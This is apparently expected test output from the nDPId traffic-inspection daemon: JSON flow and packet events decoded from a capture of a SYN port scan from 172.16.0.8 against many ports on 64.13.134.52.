-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":256,"source":"synscan.pcap","alias":"nDPId-test","flow_id":250,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058471,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7496,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":256,"source":"synscan.pcap","alias":"nDPId-test","flow_id":250,"flow_packet_id":1,"flow_last_seen":1278275058471,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058471,"pkt":"ACYLMQczACWzv5HuCABFAAAsfiUAACsGn02sEAAIQA2GNIzTHUjdU4MZAAAAAGACEAALRAAAAgQFtA=="} 
-00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":257,"source":"synscan.pcap","alias":"nDPId-test","flow_id":251,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058471,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":44176,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":257,"source":"synscan.pcap","alias":"nDPId-test","flow_id":251,"flow_packet_id":1,"flow_last_seen":1278275058471,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058471,"pkt":"ACYLMQczACWzv5HuCABFAAAsjG4AAC8GjQSsEAAIQA2GNIzSrJDdUoMYAAAAAGACEAB7\/gAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":258,"source":"synscan.pcap","alias":"nDPId-test","flow_id":252,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058471,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1183,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":258,"source":"synscan.pcap","alias":"nDPId-test","flow_id":252,"flow_packet_id":1,"flow_last_seen":1278275058471,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058471,"pkt":"ACYLMQczACWzv5HuCABFAAAs3y8AAC4GO0OsEAAIQA2GNIzSBJ\/dUoMYAAAAAGACDAAn8AAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":259,"source":"synscan.pcap","alias":"nDPId-test","flow_id":253,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058471,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":259,"source":"synscan.pcap","alias":"nDPId-test","flow_id":253,"flow_packet_id":1,"flow_last_seen":1278275058471,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058471,"pkt":"ACYLMQczACWzv5HuCABFAAAsOzYAADsG0jysEAAIQA2GNIzSw0\/dUoMYAAAAAGACEABlPwAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":260,"source":"synscan.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058471,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8300,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":260,"source":"synscan.pcap","alias":"nDPId-test","flow_id":254,"flow_packet_id":1,"flow_last_seen":1278275058471,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058471,"pkt":"ACYLMQczACWzv5HuCABFAAAsPfYAADQG1nysEAAIQA2GNIzSIGzdUoMYAAAAAGACBAAUIwAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":261,"source":"synscan.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058471,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":11967,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":261,"source":"synscan.pcap","alias":"nDPId-test","flow_id":255,"flow_packet_id":1,"flow_last_seen":1278275058471,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058471,"pkt":"ACYLMQczACWzv5HuCABFAAAsTF8AACoG0hOsEAAIQA2GNIzSLr\/dUoMYAAAAAGACDAD9zwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":262,"source":"synscan.pcap","alias":"nDPId-test","flow_id":256,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058471,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3945,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":262,"source":"synscan.pcap","alias":"nDPId-test","flow_id":256,"flow_packet_id":1,"flow_last_seen":1278275058471,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058471,"pkt":"ACYLMQczACWzv5HuCABFAAAsN1gAAC4G4xqsEAAIQA2GNIzSD2ndUoMYAAAAAGACDAAdJgAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":263,"source":"synscan.pcap","alias":"nDPId-test","flow_id":257,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058471,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5431,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":263,"source":"synscan.pcap","alias":"nDPId-test","flow_id":257,"flow_packet_id":1,"flow_last_seen":1278275058471,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058471,"pkt":"ACYLMQczACWzv5HuCABFAAAsXxUAACgGwV2sEAAIQA2GNIzSFTfdUoMYAAAAAGACBAAfWAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":264,"source":"synscan.pcap","alias":"nDPId-test","flow_id":258,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058471,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8045,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":264,"source":"synscan.pcap","alias":"nDPId-test","flow_id":258,"flow_packet_id":1,"flow_last_seen":1278275058471,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058471,"pkt":"ACYLMQczACWzv5HuCABFAAAsT44AACYG0uSsEAAIQA2GNIzSH23dUoMYAAAAAGACDAANIgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":265,"source":"synscan.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058471,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6788,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":265,"source":"synscan.pcap","alias":"nDPId-test","flow_id":259,"flow_packet_id":1,"flow_last_seen":1278275058471,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058471,"pkt":"ACYLMQczACWzv5HuCABFAAAsSeUAADYGyI2sEAAIQA2GNIzSGoTdUoMYAAAAAGACDAASCwAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":266,"source":"synscan.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058471,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5190,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":266,"source":"synscan.pcap","alias":"nDPId-test","flow_id":260,"flow_packet_id":1,"flow_last_seen":1278275058471,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058471,"pkt":"ACYLMQczACWzv5HuCABFAAAsjwoAADUGhGisEAAIQA2GNIzSFEbdUoMYAAAAAGACCAAcSQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":267,"source":"synscan.pcap","alias":"nDPId-test","flow_id":261,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058471,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1084,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":267,"source":"synscan.pcap","alias":"nDPId-test","flow_id":261,"flow_packet_id":1,"flow_last_seen":1278275058471,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058471,"pkt":"ACYLMQczACWzv5HuCABFAAAsZewAADgGqoasEAAIQA2GNIzSBDzdUoMYAAAAAGACBAAwUwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":268,"source":"synscan.pcap","alias":"nDPId-test","flow_id":262,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058530,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6839,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":268,"source":"synscan.pcap","alias":"nDPId-test","flow_id":262,"flow_packet_id":1,"flow_last_seen":1278275058530,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058530,"pkt":"ACYLMQczACWzv5HuCABFAAAsY04AADoGqySsEAAIQA2GNIzSGrfdUoMYAAAAAGACDAAR2AAAAgQFtA=="} 
-00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":269,"source":"synscan.pcap","alias":"nDPId-test","flow_id":263,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058530,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":40911,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":269,"source":"synscan.pcap","alias":"nDPId-test","flow_id":263,"flow_packet_id":1,"flow_last_seen":1278275058530,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058530,"pkt":"ACYLMQczACWzv5HuCABFAAAsyRwAAC0GUlasEAAIQA2GNIzSn8\/dUoMYAAAAAGACCACQvwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":270,"source":"synscan.pcap","alias":"nDPId-test","flow_id":264,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058530,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9666,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":270,"source":"synscan.pcap","alias":"nDPId-test","flow_id":264,"flow_packet_id":1,"flow_last_seen":1278275058530,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058530,"pkt":"ACYLMQczACWzv5HuCABFAAAs5EIAACoGOjCsEAAIQA2GNIzSJcLdUoMYAAAAAGACDAAGzQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":271,"source":"synscan.pcap","alias":"nDPId-test","flow_id":265,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058530,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1123,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":271,"source":"synscan.pcap","alias":"nDPId-test","flow_id":265,"flow_packet_id":1,"flow_last_seen":1278275058530,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058530,"pkt":"ACYLMQczACWzv5HuCABFAAAsSRoAAC0G0lisEAAIQA2GNIzSBGPdUoMYAAAAAGACCAAsLAAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":272,"source":"synscan.pcap","alias":"nDPId-test","flow_id":266,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058530,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":272,"source":"synscan.pcap","alias":"nDPId-test","flow_id":266,"flow_packet_id":1,"flow_last_seen":1278275058530,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058530,"pkt":"ACYLMQczACWzv5HuCABFAAAs2foAAC8GP3isEAAIQA2GNIzSGPXdUoMYAAAAAGACEAAPmgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":273,"source":"synscan.pcap","alias":"nDPId-test","flow_id":267,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058530,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2525,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":273,"source":"synscan.pcap","alias":"nDPId-test","flow_id":267,"flow_packet_id":1,"flow_last_seen":1278275058530,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058530,"pkt":"ACYLMQczACWzv5HuCABFAAAs4dYAADUGMZysEAAIQA2GNIzSCd3dUoMYAAAAAGACCAAmsgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":274,"source":"synscan.pcap","alias":"nDPId-test","flow_id":268,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058530,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":274,"source":"synscan.pcap","alias":"nDPId-test","flow_id":268,"flow_packet_id":1,"flow_last_seen":1278275058530,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058530,"pkt":"ACYLMQczACWzv5HuCABFAAAsjcYAADgGgqysEAAIQA2GNIzSG1jdUoMYAAAAAGACBAAZNwAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":275,"source":"synscan.pcap","alias":"nDPId-test","flow_id":269,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058530,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1840,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":275,"source":"synscan.pcap","alias":"nDPId-test","flow_id":269,"flow_packet_id":1,"flow_last_seen":1278275058530,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058530,"pkt":"ACYLMQczACWzv5HuCABFAAAsIAwAADIG9masEAAIQA2GNIzSBzDdUoMYAAAAAGACDAAlXwAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":276,"source":"synscan.pcap","alias":"nDPId-test","flow_id":270,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058530,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":280,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":276,"source":"synscan.pcap","alias":"nDPId-test","flow_id":270,"flow_packet_id":1,"flow_last_seen":1278275058530,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058530,"pkt":"ACYLMQczACWzv5HuCABFAAAsp2EAADgGaRGsEAAIQA2GNIzSARjdUoMYAAAAAGACBAAzdwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":277,"source":"synscan.pcap","alias":"nDPId-test","flow_id":271,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058530,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1131,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":277,"source":"synscan.pcap","alias":"nDPId-test","flow_id":271,"flow_packet_id":1,"flow_last_seen":1278275058530,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058530,"pkt":"ACYLMQczACWzv5HuCABFAAAskiYAACoGjEysEAAIQA2GNIzSBGvdUoMYAAAAAGACDAAoJAAAAgQFtA=="} 
-00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":278,"source":"synscan.pcap","alias":"nDPId-test","flow_id":272,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058530,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":278,"source":"synscan.pcap","alias":"nDPId-test","flow_id":272,"flow_packet_id":1,"flow_last_seen":1278275058530,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058530,"pkt":"ACYLMQczACWzv5HuCABFAAAshE8AADYGjiOsEAAIQA2GNIzSJxLdUoMYAAAAAGACDAAFfQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":279,"source":"synscan.pcap","alias":"nDPId-test","flow_id":273,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058530,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3017,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":279,"source":"synscan.pcap","alias":"nDPId-test","flow_id":273,"flow_packet_id":1,"flow_last_seen":1278275058530,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058530,"pkt":"ACYLMQczACWzv5HuCABFAAAsrUYAADkGYiysEAAIQA2GNIzSC8ndUoMYAAAAAGACCAAkxgAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":280,"source":"synscan.pcap","alias":"nDPId-test","flow_id":274,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058530,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":700,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 